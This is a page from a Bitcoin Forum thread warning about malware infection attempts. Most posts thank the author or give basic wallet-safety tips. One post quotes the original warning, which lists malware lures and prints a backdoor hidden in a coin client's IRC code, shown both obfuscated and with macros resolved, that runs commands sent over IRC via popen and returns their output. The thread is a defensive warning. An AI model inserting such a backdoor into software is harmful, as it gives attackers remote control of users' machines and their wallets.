Bitcoin Forum
March 28, 2024, 03:33:25 PM *
News: Latest Bitcoin Core release: 26.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 659351 times)
bedford1972
Jr. Member
*
Offline Offline

Activity: 266
Merit: 2


View Profile
February 21, 2018, 10:39:50 PM
 #461

Good post, very cognitive. But I would add here recommendations how to minimize the risks of infection. For example, to create a separate computer for work on the network and separately for wallets. This will help at least keep the funds stored for a long time. I will also recommend using the Tabsbook program, in which you can save frequently used links and go only for them, since attackers often use official resources and make phishing sites. There are a bunch of other recommendations that I advise you to study before you start working with a crypto currency.

QUARKCHAIN - Blockchain Sharding Technology
IS A FLEXIBLE, SCALABLE, AND USER-ORIENTED BLOCKCHAIN INFRASTRUCTURE. (https://quarkchain.io)
Remember that Bitcoin is still beta software. Don't put all of your money into BTC!
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1711640005
Hero Member
*
Offline Offline

Posts: 1711640005

View Profile Personal Message (Offline)

Ignore
1711640005
Reply with quote  #2

1711640005
Report to moderator
sportcoins
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
February 23, 2018, 04:38:47 AM
 #462

Thanks for the information. We hate Malware!
hashcoinusa
Member
**
Offline Offline

Activity: 342
Merit: 10


View Profile
February 26, 2018, 06:03:20 AM
 #463


We will never have the insight into the code.   

Dont installed wallet on your main computer. Create a virtual machine and limit your exposure.

robi5060
Newbie
*
Offline Offline

Activity: 68
Merit: 0


View Profile
February 26, 2018, 02:57:41 PM
 #464

Can anyone please told me about what coin's are effected by sophisticated attacks/ malware.
Nanoverso
Jr. Member
*
Offline Offline

Activity: 101
Merit: 3


View Profile WWW
February 26, 2018, 11:24:41 PM
Last edit: May 16, 2019, 04:50:20 AM by Nanoverso
 #465

Some information if these malware infection attempts are affecting other systems beyond Windows, like Mac or Linux?

Checkout my Mario blog (Portuguese): Jogos do Mario Bros.
Dandidada
Newbie
*
Offline Offline

Activity: 2
Merit: 0


View Profile
February 28, 2018, 08:18:18 AM
 #466

Thank y'all for the enlightenment..it's very much appreciated, knowing fully well there are lots of hacker trying to get easy crypto currency
prsharma
Newbie
*
Offline Offline

Activity: 33
Merit: 0


View Profile
February 28, 2018, 09:54:48 AM
 #467

Very userful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
thanks for info I will be cautious about content and links before click on it.
Motookerva
Newbie
*
Offline Offline

Activity: 63
Merit: 0


View Profile
March 01, 2018, 06:46:55 PM
 #468

I am newbie and thanks for informing. I would like to ask how can we spot a scammer?
Marble777
Member
**
Offline Offline

Activity: 736
Merit: 11


View Profile
March 01, 2018, 10:12:06 PM
 #469

Very userful information for me, I never thought in mind that attackers might attack on this forum and post some malicious content here.
thanks for info I will be cautious about content and links before click on it.
it applies also to me because I am a beginner so I do not understand about this forum and sometimes feel paranoid when heard there are many cases of pishing but after reading the above information I really understand da sure that this forum is safe from hackers

E x p e r i e n c e   t h e   F u t u r e   o f   D e F i
██ ███ ██    C a t e n a  X    ██ ███ ██
|        T w i t t e r        |      T e l e g r a m      |   A N N   T h r e a d   |         G i t h u b         |
seggardinggins
Full Member
***
Offline Offline

Activity: 616
Merit: 100


View Profile
March 02, 2018, 09:34:02 PM
 #470

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?
Maybe so but all the tools that are used as much as possible are only used for this purpose in my opinion would be too risky if the tool we use to open the wallet that we use also for other purposes such as games and download mp3 or video because We all know that many malware in most download link
jaydoes6
Newbie
*
Offline Offline

Activity: 24
Merit: 0


View Profile
March 03, 2018, 05:32:27 AM
 #471

Cant you give anything new? It was prevailing from a very old times in btcs
gng
Newbie
*
Offline Offline

Activity: 210
Merit: 0


View Profile
March 03, 2018, 07:56:14 AM
 #472

you think faucet sites send malware ?
AutumnSphinx
Newbie
*
Offline Offline

Activity: 4
Merit: 0


View Profile
March 03, 2018, 11:18:29 PM
 #473

This is very informative especially to newbies like me. Thank you. Reading all the threads. I need to add security measures.
Ant112990
Newbie
*
Offline Offline

Activity: 21
Merit: 0


View Profile
March 04, 2018, 04:29:50 AM
 #474

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Don't forget airship registration, asking for private keys.. I sent them mones and luckily found out immediately after I sent it.. and move my coin out the wallet and created a new wallet.
bekhuong45
Newbie
*
Offline Offline

Activity: 126
Merit: 0


View Profile
March 04, 2018, 10:32:03 AM
 #475

we need say thanks U.. Smiley) clap clpap
Magister Magus
Member
**
Offline Offline

Activity: 328
Merit: 39


View Profile
March 04, 2018, 10:44:19 AM
 #476

Thank you very much for your precious info; I'm really stunned, as I never thought there were so many ways to be scammed Sad

Your post made me to think in a paranoid way, and I just wondered if we can really trust antimalware softwares: how can we be sure that THEY don't put something malicious, or don't scan for private keys?

It seems that we are really in an electronic far west, and probably the next big battle will be in the field of security.

▂▂▃▅▇ EVO - THE WORLD OF SELF-DEVELOPMENT ▇▅▃▂▂
MEDIUM    ●  LINKEDIN  ●TELEGRAM ◄  Blockchain platform for assessing and developing human skills  ▶ TWITTER  ● FACEBOOK  ●
WHITEPAPER
rammanbl4
Full Member
***
Offline Offline

Activity: 252
Merit: 100



View Profile
March 04, 2018, 03:35:43 PM
 #477

This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.
redshiftexpensive
Newbie
*
Offline Offline

Activity: 69
Merit: 0


View Profile
March 05, 2018, 03:11:51 AM
 #478

Yes I was totally aware of it
cp3mc
Newbie
*
Offline Offline

Activity: 34
Merit: 0


View Profile
March 05, 2018, 11:19:46 AM
 #479

I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.
superresistant
Legendary
*
Offline Offline

Activity: 2128
Merit: 1120



View Profile
March 06, 2018, 02:48:33 PM
 #480

I was thinking if there is way to automatic delete any Malware link post on this forum so that we may not even get to open the link.

You can't detect if an URL is malicious or not.
Either all URL are ban or people are very careful.
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 »
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!